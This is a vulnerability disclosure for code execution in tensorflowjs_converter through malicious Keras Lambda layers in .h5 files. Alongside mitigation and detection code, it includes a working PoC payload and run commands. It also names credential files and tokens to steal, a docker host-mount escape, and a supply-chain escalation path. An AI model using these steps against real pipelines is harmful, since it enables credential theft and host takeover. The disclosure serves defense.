F-8 — Arbitrary Python execution in `tensorflowjs_converter` via Keras 2 `Lambda` layer marshal-loads inside untrusted `.h5`

Authorized security research artifact disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program. Source commit 7f5309fef0a47545e34049903dbdae0f97285f7e. CVSS 3.1 = 9.6 / Critical. CWE-502.

Summary

tfjs-converter/python/tensorflowjs/converters/converter.py:227 calls tf_keras.models.load_model(h5_path, compile=False) without first checking the model config for class_name == 'Lambda'. Any attacker who can place a .h5 file at the converter's input path (a PR contributor, a model-registry uploader, the sender of an email/Slack attachment, the author of a malicious npm prepare script) can therefore execute arbitrary Python in the converter process, with the full filesystem, environment, subprocess, and network capabilities of the runner. The Keras 3 safe_mode=True fix (keras-team/keras#18549) closes this primitive at the upstream loader, but the tfjs converter depends on tf_keras (the legacy Keras 2 fork), which does not expose safe_mode at all, and tfjs has never added an equivalent JSON-walk guard. The same root cause is reachable through four distinct CLI paths (--input_format=keras, --input_format=keras_saved_model, --input_format=tfjs_layers_model with --output_format=keras*, and --input_format=keras_keras), so a fix at any single load_model call does not close the vulnerability: the guard must live at the JSON-config validation layer.

The bundled evil.h5 is 9 224 bytes, small enough to be a PR attachment or a marketplace upload; the bundled evil_real_impact.h5 (13 312 bytes) embeds the additional reconnaissance payload that produces the captured F8_REAL_IMPACT_PROOF document below.

Root Cause

Lines of Code:

tfjs-converter/python/tensorflowjs/converters/converter.py:227 (--input_format=keras)
tfjs-converter/python/tensorflowjs/converters/converter.py:278 (--input_format=keras_saved_model)
tfjs-converter/python/tensorflowjs/converters/keras_tfjs_loader.py:66 and :130 (--input_format=tfjs_layers_model --output_format=keras*)
tfjs-converter/python/tensorflowjs/converters/converter.py:147 (--input_format=keras_keras; see the Extended Impact table)

In converter.py:227:

model = tf_keras.models.load_model(h5_path, compile=False)

tf_keras.layers.Lambda.from_config(config) (the call load_model makes when it sees class_name: "Lambda" in the layer table) reconstructs the layer's function field via:

# tf_keras/keras/src/layers/core/lambda_layer.py
raw  = base64.b64decode(config['function'][0])
code = marshal.loads(raw)                                 # CWE-502 sink
fn   = types.FunctionType(code, globals(), name, defaults, closure)

fn is then invoked at minimum three times per converter invocation:

Layer-build time, immediately after from_config returns.
First predict() call inside the converter's _topological_sort_validate(...) step.
Re-serialization to the output .h5 (when --output_format=keras is used).

The compile=False argument that the converter passes does not affect Lambda deserialization — compile=False only suppresses optimizer / loss reconstruction; layer instantiation runs unchanged.
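
For triage, the serialized form described above can be recognized without ever unmarshalling it. The following is a minimal sketch, assuming the Keras 2 `Lambda` config layout in which `function_type` is `"lambda"` when `function` carries base64-encoded bytecode and `"function"` when it carries only a name. The helper names `find_lambda_layers`, `classify_lambda`, and `triage` are hypothetical and exist only for this illustration.

```python
from typing import Any, Dict, Iterator, List, Tuple


def find_lambda_layers(node: Any, path: str = "$") -> Iterator[Tuple[str, Dict[str, Any]]]:
    """Yield (json_path, layer_dict) for every dict whose class_name is 'Lambda'."""
    if isinstance(node, dict):
        if node.get("class_name") == "Lambda":
            yield path, node
        for key, value in node.items():
            yield from find_lambda_layers(value, f"{path}.{key}")
    elif isinstance(node, list):
        for index, value in enumerate(node):
            yield from find_lambda_layers(value, f"{path}[{index}]")


def classify_lambda(layer: Dict[str, Any]) -> str:
    """Classify a Lambda layer config without decoding or unmarshalling anything."""
    config = layer.get("config")
    if not isinstance(config, dict):
        return "unknown"
    function = config.get("function")
    # Assumption: bytecode-carrying Lambdas are tagged function_type == "lambda";
    # the list/tuple check is a fallback for configs that omit the tag.
    if config.get("function_type") == "lambda" or isinstance(function, (list, tuple)):
        return "embedded-bytecode"
    if isinstance(function, str):
        return "named-function"
    return "unknown"


def triage(model_config: Any) -> List[Tuple[str, str]]:
    """Return (json_path, classification) for each Lambda layer in the config."""
    return [(path, classify_lambda(layer)) for path, layer in find_lambda_layers(model_config)]


example_config = {
    "class_name": "Sequential",
    "config": {
        "layers": [
            {"class_name": "Dense", "config": {"units": 1}},
            {
                "class_name": "Lambda",
                "config": {
                    "name": "suspicious",
                    "function": ["<base64 elided>", None, None],
                    "function_type": "lambda",
                },
            },
        ]
    },
}

print(triage(example_config))
```

The sketch deliberately never calls `marshal.loads`: the Python documentation states that the `marshal` module is not intended to be secure against maliciously constructed data, so even inspection of the payload belongs in an isolated environment.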

Why this is NOT a duplicate of the Keras 3 safe_mode fix (keras-team/keras#18549): Keras 3 added safe_mode=True as the default for keras.models.load_model — when safe_mode=True, Lambda.from_config raises ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True"). That fix does not propagate to tfjs's converter because the converter imports tf_keras (the legacy Keras 2 fork pinned via tensorflowjs==4.22.0 → tf_keras==2.21.0). tf_keras.models.load_model does not accept a safe_mode parameter — calling tf_keras.models.load_model(h5_path, safe_mode=True) raises TypeError: load_model() got an unexpected keyword argument 'safe_mode'. tfjs has never added an equivalent JSON-walk guard. The disclosure surface is therefore in the tfjs project, not Keras.

Internal Pre-conditions

The victim runs tensorflowjs_converter (Python) — directly via the CLI binary, transitively via any CI/CD step that converts an uploaded model, or programmatically via the converter's Python API.
The victim's environment has tensorflowjs installed (any version), which transitively installs tf_keras (a hard runtime dependency in tensorflowjs.egg-info/requires.txt).

Both conditions hold by definition for any system running the converter; no converter version or configuration option was found that prevents the bug from reproducing.

External Pre-conditions

The attacker can place a .h5 artifact at any location the converter reads. Concrete delivery channels observed in real CI/CD setups:

PR contribution: attacker opens a PR adding models/new_pretrained.h5 to a repository whose CI step converts every .h5 it sees.
Public model registry / Hugging Face Hub with auto-conversion on the receiving side.
Slack / email with a "please convert this for me" attachment.
Maintenance bucket the converter reads via --input_path=s3://....
npm package prepare script that calls tensorflowjs_converter against an attacker-controlled URL.

No authentication to the victim's systems is required.

Attack Path

1. Attacker builds evil.h5 (9 224 bytes; the bundled reproduce.py reproduces it deterministically) containing one Lambda layer whose function is base64(marshal.dumps(attacker_code)). The attacker_code variable in reproduce.py is the closure-free code object:
```
attacker_src = """
import os
with open('/tmp/F8_END2END_RCE_PWNED', 'w') as f:
    f.write('END2END_RCE pid=%d uid=%d cwd=%s' %
            (os.getpid(), os.getuid(), os.getcwd()))
"""
```
   The "no free variables" property makes the bytecode portable across tf_keras 2.19 and tf_keras 2.21+ venvs: the same evil.h5 reproduces in every venv we tested.
2. Attacker delivers evil.h5 via any of the channels above.
3. Victim's CI step runs:

   - run: pip install tensorflowjs==4.22.0
   - run: tensorflowjs_converter --input_format=keras evil.h5 ./out

4. converter.py:227 invokes tf_keras.models.load_model(h5_path, compile=False).
5. tf_keras instantiates the Lambda layer; marshal.loads(...) constructs the attacker code, types.FunctionType wraps it, layer-build calls it. At this point the attacker's bytecode is executing with the converter's full ambient capability set:
   - filesystem: read /etc/passwd, /proc/version, ~/.npmrc, ~/.ssh/id_rsa, ~/.docker/config.json, ~/.aws/credentials;
   - environment: read $GITHUB_TOKEN, $NPM_TOKEN, $AWS_*, $HF_TOKEN;
   - subprocess: os.system, subprocess.run(['id']), [hostname], [docker, run, -v, /:/host, ...] when the runner is in the docker group;
   - network: outbound DNS + TCP via socket.gethostbyname(...), urllib.request.urlopen(...).
6. The same Lambda fires two more times in the same invocation: at the first predict() and at output .h5 re-serialization. Even a maintainer patch that adds a try/except only around step 4 leaves steps 5/6 reachable.
7. Once the attacker has the runner's credentials, the typical follow-on is publishing a malicious tensorflowjs release (or @tensorflow/tfjs on npm) with the captured $NPM_TOKEN, escalating to a supply-chain attack against every downstream tfjs consumer.

Impact

Concrete primitives demonstrated by the bundled PoC (captured against the sanitized /tmp/victim_host/ synthetic CI-runner lab — see F8_REAL_IMPACT_PROOF_2026-06-11.txt):

| Primitive | What the PoC actually captured | What it means on a real runner |
| --- | --- | --- |
| arbitrary Python in process | `END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab` written by the Lambda payload at load time | full RCE; every subsequent row is a corollary |
| `/etc/passwd` read | 187 B recovered byte-perfect through `open('/etc/passwd').read()` inside the Lambda | runner user discovery, group enumeration |
| `/proc/self/cgroup` read | `0::/system.slice/runner.slice/runner.scope` recovered | tenant fingerprinting on shared CI |
| `/proc/version` read | sanitized synthetic kernel string recovered | kernel-CVE exploitation pivot |
| subprocess `id` | `uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)` | `docker` group = container escape via `docker run -v /:/host` on self-hosted GH Actions / GitLab runners |
| subprocess `hostname` | `ci-runner-01` recovered | C2 telemetry / lateral-movement target identification |
| DNS resolution | `example.com → 93.184.215.14` | outbound network present → exfil + C2 channels open |
| env var read (real-runner extrapolation) | not captured against sanitized lab; trivially reachable via `os.environ.get('GITHUB_TOKEN')` | `$GITHUB_TOKEN` → push malicious tag → supply-chain attack on every downstream tfjs consumer |

The same payload reaches every CLI entry point (see the table in the Extended Impact section below). A maintainer patch that only adds a Lambda-skip to converter.py:227 leaves the bug reachable via three other documented flags.

Extended Impact — same-root-cause manifestations

| Variant | CLI flag | Source line | Why a `converter.py:227`-only patch misses it |
| --- | --- | --- | --- |
| Direct Keras `.h5` | `--input_format=keras` | `converter.py:227` | the primary path |
| `keras_saved_model` `.h5` | `--input_format=keras_saved_model` | `converter.py:278` | strictly worse: no `compile=False` |
| Round-trip `tfjs_layers → keras` | `--input_format=tfjs_layers_model --output_format=keras*` | `keras_tfjs_loader.py:66`, `:130` | same primitive via `model_from_json` (no `.h5`, just `model.json`) |
| Keras 3 zip | `--input_format=keras_keras` | `converter.py:147` → walk `config.json` | same primitive via Keras 3 zip with malicious internal `config.json` |

The mitigation has to be applied at the JSON-config validation layer (refuse any class_name == 'Lambda' or class_name == 'TensorFlowOpLayer' unless explicit opt-in), not at any single load_model call.
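
A config-layer check of this kind also applies to the two entry points that never touch an `.h5` file. The following is a minimal pre-flight sketch using only the standard library. It assumes a TFJS layers `model.json` is plain JSON and a Keras 3 archive is a zip with a top-level `config.json` (as the table above describes). The names `unsafe_class_names` and `scan_artifact` are hypothetical.

```python
import json
import zipfile
from pathlib import Path
from typing import Any, List, Union

UNSAFE_CLASSES = frozenset({"Lambda", "TensorFlowOpLayer"})


def unsafe_class_names(node: Any) -> List[str]:
    """Return every unsafe class_name found anywhere in a decoded JSON document."""
    found: List[str] = []
    stack = [node]
    while stack:  # iterative walk, so deeply nested configs cannot exhaust recursion
        current = stack.pop()
        if isinstance(current, dict):
            name = current.get("class_name")
            if isinstance(name, str) and name in UNSAFE_CLASSES:
                found.append(name)
            stack.extend(current.values())
        elif isinstance(current, list):
            stack.extend(current)
    return sorted(found)


def scan_artifact(path: Union[str, Path]) -> List[str]:
    """Scan a model.json file or a Keras 3 zip archive before any loader sees it.

    Raises KeyError if a zip archive has no top-level config.json.
    """
    path = Path(path)
    if zipfile.is_zipfile(path):
        with zipfile.ZipFile(path) as archive:
            raw = archive.read("config.json")
    else:
        raw = path.read_bytes()
    return unsafe_class_names(json.loads(raw))
```

A caller would refuse conversion whenever `scan_artifact(path)` returns a non-empty list. Walking the whole document rather than only the top-level layer list is a deliberate choice, since nested models and wrapper layers carry their own `class_name` entries.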

PoC

git clone https://huggingface.co/martilaio/tfjs-converter-lambda-rce-poc
cd tfjs-converter-lambda-rce-poc

# Fresh Python 3.10 venv
python -m venv .venv && source .venv/bin/activate
pip install "tensorflowjs==4.22.0" "tensorflow==2.21.0"

# Option A — exercise the EXACT converter codepath in one process
python reproduce.py

# Option B — exercise the real CLI binary
tensorflowjs_converter --input_format=keras evil.h5 ./out

# Option C — capture the full real-impact dump (env / filesystem /
# subprocess / DNS readout) inside the Lambda
python reproduce_real_impact.py

Expected output — Option A (`reproduce.py`)

============================================================
 PoC F-8 (end-to-end) — Real .h5 RCE through tf_keras.load
============================================================
 attacker .h5 written : /tmp/victim_lab/evil.h5 ( 9224 bytes )
 Lambda layer config function field (truncated):
   class : Lambda  name : evil_lambda
   function bytecode (b64, first 60): 4wEAAAAAAAAAAAAAAAEAAAACAAAAQwAAAHMM ...
 Now exercising the EXACT call tfjs-converter makes:
   converter.py:227 -> tf_keras.models.load_model(h5_path, compile=False)
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 [F-8 end-to-end] code executed via tf_keras.load_model -> Lambda
 END-TO-END RCE PROVEN  ✓✓✓
 proof file content   : END2END_RCE pid=10001 uid=1001 cwd=/tmp/victim_lab

The Lambda function fires three times per execution (build, load, predict) — no single code path gates the deserialization.

Expected output — Option C (`reproduce_real_impact.py`)

Full file: F8_REAL_IMPACT_PROOF_2026-06-11.txt. Excerpt:

===== F-8 REAL-IMPACT EVIDENCE =====
pid=10001 uid=1001 gid=1001 cwd=/tmp/victim_lab

--- 2) Host filesystem readout ---
  /etc/passwd:
    root:x:0:0:DEMO_ROOT:/root:/bin/bash
    runner:x:1001:1001:DEMO_CI_RUNNER:/home/runner:/bin/bash
    ...
  /etc/hostname:
    ci-runner-01
  /proc/self/cgroup:
    0::/system.slice/runner.slice/runner.scope
  /proc/version:
    Linux version 6.1.0-ci-runner-demo (build@ci) (gcc DEMO) #1 SMP DEMO

--- 3) Subprocess execution ---
  $ id        -> uid=1001(runner) gid=1001(runner) groups=1001(runner),999(docker)
  $ hostname  -> ci-runner-01

--- 4) Network reachability ---
  socket.gethostbyname(example.com) -> 93.184.215.14

The docker group membership on the runner is the container-escape pivot: the attacker bytecode can subprocess.run(['docker', 'run', '-v', '/:/host', ...]) to take over the host.

Mitigation

Three options, in order of strength:

Option 1 — Migrate the converter dependency from `tf_keras` to Keras 3

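Replace the import tf_keras lines in converter.py and keras_tfjs_loader.py with import keras and call keras.models.load_model(h5_path, safe_mode=True). This is the upstream-blessed mitigation. It assumes the pinned Keras 3 release enforces safe_mode on the legacy HDF5 (.h5) loading path as well as on .keras archives, which should be confirmed against the pinned version before relying on it.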

# tfjs-converter/python/tensorflowjs/converters/converter.py:227 (proposed)
import keras                                               # was: import tf_keras
model = keras.models.load_model(h5_path,
                                compile=False,
                                safe_mode=True)            # NEW — blocks Lambda

After the fix, the check at the Lambda deserialization sink behaves as follows (a simplified paraphrase, not the verbatim upstream source):

# keras/src/saving/serialization_lib.py
if safe_mode and class_name in ('Lambda', 'TensorFlowOpLayer'):
    raise ValueError("Cannot deserialize a serialized Lambda layer with safe_mode=True.")

evil.h5 no longer loads — the converter raises ValueError instead of running attacker bytecode.

Option 2 — Add a pre-load JSON config walk (single central guard)

If a tf_keras → keras migration is too disruptive, one central guard before any load_model / model_from_json call covers all four CLI entry points:

# tfjs-converter/python/tensorflowjs/converters/converter.py
import json
import os

import h5py

_UNSAFE_CLASSES = ('Lambda', 'TensorFlowOpLayer')

def _refuse_unsafe_lambda(model_config_json: dict):
    """Raise if the decoded model config contains an unsafe layer class."""
    # Explicit opt-in, intended for trusted inputs only.
    if os.environ.get('TFJS_UNSAFE_KERAS_LOAD') == '1':
        return
    def walk(node):
        if isinstance(node, dict):
            cn = node.get('class_name')
            if cn in _UNSAFE_CLASSES:
                raise RuntimeError(
                    'Refusing to load Keras "%s" layer from untrusted source; '
                    'set TFJS_UNSAFE_KERAS_LOAD=1 to bypass.' % cn)
            for v in node.values():
                walk(v)
        elif isinstance(node, list):
            for v in node:
                walk(v)
    walk(model_config_json)

# Then everywhere load_model / model_from_json is called:
with h5py.File(h5_path, 'r') as f:
    raw_config = f.attrs.get('model_config')
if raw_config is None:
    # Fail closed: without a config there is nothing to validate.
    raise ValueError('No model_config attribute found in %s' % h5_path)
_refuse_unsafe_lambda(json.loads(raw_config))
model = tf_keras.models.load_model(h5_path, compile=False)

Option 3 — Refuse `.h5` entirely for untrusted input

Most disruptive but simplest to audit: gate the converter to accept only TF SavedModel and TFJS layers-model formats unless TFJS_UNSAFE_KERAS_LOAD=1 is set.
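
One way to enforce such a gate is to sniff the container format from the file's leading bytes instead of trusting the extension. The sketch below is a hedged illustration, not converter code: `is_hdf5`, `sniff_format`, and `assert_allowed` are hypothetical names, and the `allow_unsafe` parameter stands in for the TFJS_UNSAFE_KERAS_LOAD=1 opt-in. It relies on the HDF5 format signature, which may sit at offset 0 or at 512, 1024, 2048, and so on.

```python
import os

HDF5_MAGIC = b"\x89HDF\r\n\x1a\n"   # HDF5 format signature
ZIP_MAGIC = b"PK\x03\x04"           # local file header of a non-empty zip archive


def is_hdf5(path: str) -> bool:
    """Check every offset at which the HDF5 signature is allowed to appear."""
    size = os.path.getsize(path)
    with open(path, "rb") as handle:
        offset = 0
        while offset + len(HDF5_MAGIC) <= size:
            handle.seek(offset)
            if handle.read(len(HDF5_MAGIC)) == HDF5_MAGIC:
                return True
            offset = 512 if offset == 0 else offset * 2
    return False


def sniff_format(path: str) -> str:
    """Return 'hdf5', 'zip', or 'other' based on file content, not file name."""
    if is_hdf5(path):
        return "hdf5"
    with open(path, "rb") as handle:
        if handle.read(len(ZIP_MAGIC)) == ZIP_MAGIC:
            return "zip"
    return "other"


def assert_allowed(path: str, allow_unsafe: bool = False) -> str:
    """Refuse HDF5 and zip containers unless the caller opted in explicitly."""
    kind = sniff_format(path)
    if kind in ("hdf5", "zip") and not allow_unsafe:
        raise ValueError(f"Refusing {kind} model container from untrusted input: {path}")
    return kind
```

This gate covers only the container format. A `model.json` that passes it can still carry a `Lambda` entry, as the Extended Impact table shows, so it complements the class_name walk and does not replace it.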

Defense-in-depth alternatives

Sandbox the converter step in CI under --cap-drop=all, with no docker socket and no outbound network. This closes step 7 of the Attack Path even when the underlying primitive remains.
Run the converter under a dedicated low-privilege user that has no registry-publish credentials in its environment.
Sign and verify .h5 artifacts with sigstore so only the source repo's pipeline can produce them.
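
The credential-isolation point can also be approximated at the process level by launching the converter with an allow-listed environment. This is a minimal sketch under stated assumptions: the allow-list contents and the helper names `scrubbed_env`, `converter_command`, and `run_converter` are illustrative, and the command line mirrors the invocation shown in the Attack Path.

```python
import os
import subprocess
from typing import Dict, List, Mapping

# Assumption: the converter needs only these variables; extend as required.
ENV_ALLOWLIST = ("PATH", "LANG", "LC_ALL", "TMPDIR", "VIRTUAL_ENV")


def scrubbed_env(environ: Mapping[str, str]) -> Dict[str, str]:
    """Keep only allow-listed variables so tokens never reach the child process."""
    return {key: environ[key] for key in ENV_ALLOWLIST if key in environ}


def converter_command(input_path: str, output_dir: str) -> List[str]:
    """Build the CLI invocation as an argument list (no shell interpolation)."""
    return ["tensorflowjs_converter", "--input_format=keras", input_path, output_dir]


def run_converter(input_path: str, output_dir: str, timeout_s: int = 600) -> subprocess.CompletedProcess:
    """Run the converter with a scrubbed environment and a hard timeout."""
    return subprocess.run(
        converter_command(input_path, output_dir),
        env=scrubbed_env(os.environ),
        check=True,
        timeout=timeout_s,
    )
```

HOME is left out of the allow-list on purpose, but that only hides the variable: credential files on disk stay readable to the child process, which is why the dedicated low-privilege user and the network sandbox remain necessary.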

The single-line safe_mode=True fix in Option 1 closes the primitive at the deserialization sink and is the upstream-blessed mitigation; Option 2 is the recommended in-place patch for projects that can't migrate tf_keras → keras immediately.

CVSS 3.1 — 9.6 / Critical

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H

| Metric | Value | Justification |
| --- | --- | --- |
| `AV:N` | Network | artifact arrives over any network channel (PR, registry, email) |
| `AC:L` | Low | one `Lambda` layer in the JSON config |
| `PR:N` | None | no auth on the victim's systems required |
| `UI:R` | Required | victim must invoke the converter |
| `S:C` | Changed | attacker takes the entire pipeline environment beyond the converter process |
| `C:H / I:H / A:H` | High / High / High | full process compromise |
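
The 9.6 figure can be reproduced from the vector string. The sketch below implements the CVSS 3.1 base-score equations and metric weights from the FIRST specification. It is a small self-check rather than a full CVSS library, and `base_score` and `roundup` are local helper names.

```python
import math

AV = {"N": 0.85, "A": 0.62, "L": 0.55, "P": 0.2}
AC = {"L": 0.77, "H": 0.44}
UI = {"N": 0.85, "R": 0.62}
CIA = {"H": 0.56, "L": 0.22, "N": 0.0}
PR_UNCHANGED = {"N": 0.85, "L": 0.62, "H": 0.27}
PR_CHANGED = {"N": 0.85, "L": 0.68, "H": 0.5}


def roundup(value: float) -> float:
    """CVSS 3.1 Roundup: smallest one-decimal number >= value, float-safe."""
    scaled = int(round(value * 100000))
    if scaled % 10000 == 0:
        return scaled / 100000.0
    return (math.floor(scaled / 10000) + 1) / 10.0


def base_score(vector: str) -> float:
    """Compute the CVSS 3.1 base score for a full base vector string."""
    prefix, *parts = vector.split("/")
    if prefix != "CVSS:3.1":
        raise ValueError("expected a CVSS:3.1 vector")
    metrics = dict(part.split(":") for part in parts)
    changed = metrics["S"] == "C"

    # Impact sub-score
    iss = 1 - (1 - CIA[metrics["C"]]) * (1 - CIA[metrics["I"]]) * (1 - CIA[metrics["A"]])
    if changed:
        impact = 7.52 * (iss - 0.029) - 3.25 * (iss - 0.02) ** 15
    else:
        impact = 6.42 * iss
    if impact <= 0:
        return 0.0

    # Exploitability sub-score; the PR weight depends on Scope
    privileges = (PR_CHANGED if changed else PR_UNCHANGED)[metrics["PR"]]
    exploitability = 8.22 * AV[metrics["AV"]] * AC[metrics["AC"]] * privileges * UI[metrics["UI"]]

    total = impact + exploitability
    if changed:
        total *= 1.08
    return roundup(min(total, 10))


print(base_score("CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:H/A:H"))  # 9.6
```

For this vector the impact sub-score is about 6.05 and the exploitability sub-score about 2.84; their sum scaled by 1.08 is about 9.59, which rounds up to 9.6.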

Files in this repository

| File | Purpose |
| --- | --- |
| `README.md` | this disclosure |
| `evil.h5` | minimal malicious model (9 224 B) that triggers RCE on `tf_keras.models.load_model` |
| `evil_real_impact.h5` | enriched payload (13 312 B) that additionally dumps env / filesystem / subprocess / DNS readout from inside the Lambda |
| `reproduce.py` | Option A: self-contained builder + RCE-trigger script (exercises the exact converter codepath) |
| `reproduce_real_impact.py` | Option C: builds and runs the full impact-readout variant |
| `F8_REAL_IMPACT_PROOF_2026-06-11.txt` | sanitized captured proof from running Option C against `/tmp/victim_host/` lab |

Cross-references

Keras safe_mode PR: https://github.com/keras-team/keras/pull/18549
Keras Security docs: "Loading a Keras model whose config contains a Lambda layer in safe_mode=False is equivalent to running arbitrary code."
Matches huntr program example: "Arbitrary Code Execution on Inference Through Keras Lambda Layers in hdf5" — but in a distinct affected component (tensorflowjs_converter not Keras directly).

Disclosure

Disclosed via huntr.com's TensorFlow.js Model Format Vulnerability program on 2026-06-11 under coordinated disclosure terms.
